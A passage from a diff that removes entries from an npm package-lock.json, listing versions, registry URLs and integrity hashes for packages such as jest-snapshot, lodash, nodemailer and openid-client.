"@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-haste-map": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.4.1", - "semver": "^7.3.5" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/jest-snapshot/node_modules/diff-sequences": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.3.1.tgz", - "integrity": "sha512-hlM3QR272NXCi4pq+N4Kok4kOp6EsgOM3ZSpJI7Da3UAs+Ttsi8MRmB6trM/lhyzUxGfOgnpkHtgqm5Q/CTcfQ==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/jest-diff": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.4.1.tgz", - "integrity": "sha512-uazdl2g331iY56CEyfbNA0Ut7Mn2ulAG5vUaEHXycf1L6IPyuImIxSz4F0VYBKi7LYIuxOwTZzK3wh5jHzASMw==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.3.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-snapshot/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jest-snapshot/node_modules/write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^14.17.0 || ^16.13.0 || >=18.0.0" - } - }, - "node_modules/jest-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.4.1.tgz", - "integrity": "sha512-bQy9FPGxVutgpN4VRc0hk6w7Hx/m6L53QxpDreTZgJd9gfx/AV2MjyPde9tGyZRINAUrSv57p2inGBu2dRLmkQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.4.1.tgz", - "integrity": "sha512-qNZXcZQdIQx4SfUB/atWnI4/I2HUvhz8ajOSYUu40CSmf9U5emil8EDHgE7M+3j9/pavtk3knlZBDsgFvv/SWw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "leven": "^3.1.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-validate/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-watcher": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.4.1.tgz", - "integrity": "sha512-vFOzflGFs27nU6h8dpnVRER3O2rFtL+VMEwnG0H3KLHcllLsU8y9DchSh0AL/Rg5nN1/wSiQ+P4ByMGpuybaVw==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.4.1", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "dependencies": { - "argparse": "^2.0.1" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==", - "engines": { - "node": ">=12.0.0" - } - }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, - "engines": { - "node": ">=0.6.0" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" - }, - "node_modules/lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true - }, - "node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "devOptional": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.4", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.4.tgz", - "integrity": "sha512-pRmzw/XUcwXGpD9aI9q/0XOwLNygjETJ8y0ao0wdqprrzDa4YnxLcz7fQRZr8voh8V10kGhABbNcHVk5wHgWwg==", - "dev": true, - "dependencies": { - "braces": "^3.0.1", - "picomatch": "^2.2.3" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mime-db": { - "version": "1.49.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", - "integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==", - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mime-types": { - "version": "2.1.32", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", - "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", - "dependencies": { - "mime-db": "1.49.0" - }, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/minipass": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.1.3.tgz", - "integrity": "sha512-Mgd2GdMVzY+x3IJ+oHnVM+KG3lA5c8tnabyJKmHSaG2kAGpudxuOf8ToDkhumF7UzME7DecbQE9uOZhNm7PuJg==", - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", - "dependencies": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", - "bin": { - "mkdirp": "bin/cmd.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha1-h6kGXNs1XTGC2PlM4RGIuCXGijs=", - "dev": true - }, - "node_modules/node-releases": { - "version": "1.1.74", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-1.1.74.tgz", - "integrity": "sha512-caJBVempXZPepZoZAPCWRTNxYQ+xtG/KAi4ozTA5A+nJ7IU+kLQCbqaUjb5Rwy14M9upBWiQ4NutcmW04LJSRw==", - "dev": true - }, - "node_modules/nodemailer": { - "version": "6.9.9", - "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-6.9.9.tgz", - "integrity": "sha512-dexTll8zqQoVJEZPwQAKzxxtFn0qTnjdQTchoU6Re9BUUGBJiOy3YMn/0ShTW6J5M0dfQ1NeDeRTTl4oIWgQMA==", - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/nunjucks": { - "version": "3.2.4", - "resolved": "https://registry.npmjs.org/nunjucks/-/nunjucks-3.2.4.tgz", - "integrity": "sha512-26XRV6BhkgK0VOxfbU5cQI+ICFUtMLixv1noZn1tGU38kQH5A5nmmbk/O45xdyBhD1esk47nKrY0mvQpZIhRjQ==", - "dependencies": { - "a-sync-waterfall": "^1.0.0", - "asap": "^2.0.3", - "commander": "^5.1.0" - }, - "bin": { - "nunjucks-precompile": "bin/precompile" - }, - "engines": { - "node": ">= 6.9.0" - }, - "peerDependencies": { - "chokidar": "^3.3.0" - }, - "peerDependenciesMeta": { - "chokidar": { - "optional": true - } - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "engines": { - "node": "*" - } - }, - "node_modules/object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "optional": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/oidc-token-hash": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.1.tgz", - "integrity": "sha512-EvoOtz6FIEBzE+9q253HsLCVRiK/0doEJ2HCvvqMQb3dHZrP3WlJKYtJ55CRTw4jmYomzH4wkPuCj/I3ZvpKxQ==", - "optional": true, - "engines": { - "node": "^10.13.0 || >=12.0.0" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/openid-client": { - "version": "5.4.0", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.0.tgz", - "integrity": "sha512-hgJa2aQKcM2hn3eyVtN12tEA45ECjTJPXCgUh5YzTzy9qwapCvmDTVPWOcWVL0d34zeQoQ/hbG9lJhl3AYxJlQ==", - "optional": true, - "dependencies": { - "jose": "^4.10.0", - "lru-cache": "^6.0.0", - "object-hash": "^2.0.1", - "oidc-token-hash": "^5.0.1" - }, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": 